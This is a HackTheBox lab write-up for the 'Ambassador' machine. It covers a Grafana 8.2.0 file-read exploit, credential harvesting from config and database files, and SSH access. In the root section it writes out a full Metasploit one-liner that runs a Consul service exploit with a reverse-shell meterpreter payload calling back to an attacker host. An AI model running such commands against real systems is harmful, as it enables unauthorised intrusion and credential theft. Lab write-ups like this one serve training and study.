> For the complete documentation index, see [llms.txt](https://malw0re.gitbook.io/notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://malw0re.gitbook.io/notes/hackthebox/ambassador.md).

# Ambassador

Some nice Writeup

### Scan Details

```
PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack
80/tcp   open  http    syn-ack
3000/tcp open  ppp     syn-ack
3306/tcp open  mysql   syn-ack
```

looking at port 3000 we are presented with a login page which is running grafana with a version 8.2.0, vulnerable to Directory Traversal and Arbitrary File Read to local files. The vulnerable path grafana\_url/public/plugins/<'plugin-id'> where <'plugin id'> is the plugin id for any installed plugin.

Every grafana instance comes with pre-installed plugins like Prometheus plugin or MySQL plugin so with this multiple URLS are vulnerable for every instance.

### Enumeration.

We can reach the log in screen and find out the grafana version, in our case using port 3000 (Version v8.2.0 (d7f71e9eae)

<figure><img src="https://2448159634-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FZ3qjCoK8e9KxZEgUXr4K%2Fuploads%2FPBqhJZQFz0L80HKp5NRV%2Fgrafana_login.png?alt=media&amp;token=68bdb390-6287-4a7e-b596-be872d773f70" alt=""><figcaption></figcaption></figure>

Using curl we can also query the /login page&#x20;

<figure><img src="https://2448159634-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FZ3qjCoK8e9KxZEgUXr4K%2Fuploads%2FX1KBs3xITbU75WmNkhXL%2Fculr_request.png?alt=media&amp;token=02cc1534-0eee-4181-8c71-8a9423c0128c" alt=""><figcaption></figcaption></figure>

### Exploitation (Script)

So having identified the version of the application, we can confirm the application is vulnerable, using this <https://www.exploit-db.com/exploits/50581> automated script we can read files.

We can try all the known readable config files to find interesting information, based on their documentation (<https://github.com/grafana/grafana/blob/main/conf/defaults.ini>), /etc/grafana/grafana.ini seems interesting, since it holds user/password info under the security section..

<figure><img src="https://2448159634-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FZ3qjCoK8e9KxZEgUXr4K%2Fuploads%2FoDkIhIo6SoAvlb8q1CHU%2Fscript_pwd.png?alt=media&amp;token=3a6fbdd7-0e42-493d-bb3d-c1b6bcf7ebaf" alt=""><figcaption></figcaption></figure>

## Exploitation (Manual)

We can use curl to read  the database files and store them locally.

<figure><img src="https://2448159634-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FZ3qjCoK8e9KxZEgUXr4K%2Fuploads%2Fq4Fdisyc8kEqeQS66edb%2Fgrafana_db.png?alt=media&amp;token=d6c6bd92-00dc-4736-9b18-b238c712e555" alt=""><figcaption></figcaption></figure>

&#x20;Now using sqlite3 we can read the database file, there is data source table that holds user information.&#x20;

<figure><img src="https://2448159634-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FZ3qjCoK8e9KxZEgUXr4K%2Fuploads%2FSUqYoS1gxXRldP8lxked%2Fgrafana_db_pass.png?alt=media&amp;token=905efb8f-67ef-435e-a9aa-05f8182fcdf0" alt=""><figcaption></figcaption></figure>

Having the password from the database checking the .ini file we get some sql credentials we can use to login into the mysql server, which gives us whackywidget databases some information.

<figure><img src="https://2448159634-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FZ3qjCoK8e9KxZEgUXr4K%2Fuploads%2F6pyXk96obHOt6g5FU9qq%2Fmysql_pass.png?alt=media&amp;token=400f0624-0d37-4405-9359-251e130f4b16" alt=""><figcaption></figcaption></figure>

### Foothold.

Now, having the password from the database we can ssh with the user developer and get the user flag.

<figure><img src="https://2448159634-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FZ3qjCoK8e9KxZEgUXr4K%2Fuploads%2FayaVlGTjVtU2j8xbHzdM%2Fuser.png?alt=media&amp;token=a520e363-8274-425c-9811-76ee4bd39b9c" alt=""><figcaption></figcaption></figure>

### Root Privesc (metasploit version).

Having logged in as the developer user, looking around in the opt directory we find two folders consul and my-app, which my-app has some interesting logs

<figure><img src="https://2448159634-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FZ3qjCoK8e9KxZEgUXr4K%2Fuploads%2F6PdF5h3Xju5guqmsrw7C%2Fgit_log.png?alt=media&amp;token=a776a68d-e175-4c5f-8563-f0fb04811684" alt=""><figcaption></figcaption></figure>

From the logs, we identify it's running a Hashicorp Consul's services API researching online we find that consul can be exploited to gain remote command execution on Consul nodes.

```
sudo msfconsole -q -x "use multi/misc/consul_service_exec; set payload linux/x86/meterpreter/reverse_tcp;set rhosts 127.0.0.1; set lhost Your_IP; set acl_token bb03b43b-1d81-d62b-24b5-39540ee469b5; set lport 4444; exploit"
```

Using the above metasploit command we get a root shell,&#x20;

<figure><img src="https://2448159634-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FZ3qjCoK8e9KxZEgUXr4K%2Fuploads%2FqpBfQ5AeSDWg6dKdd6QP%2Frooter.png?alt=media&amp;token=a0b0685c-0ad9-4816-aeca-82837e6e74b9" alt=""><figcaption></figcaption></figure>

### Root Privesc (Manual).

I will later add the manual method to exploiting consul using the api................
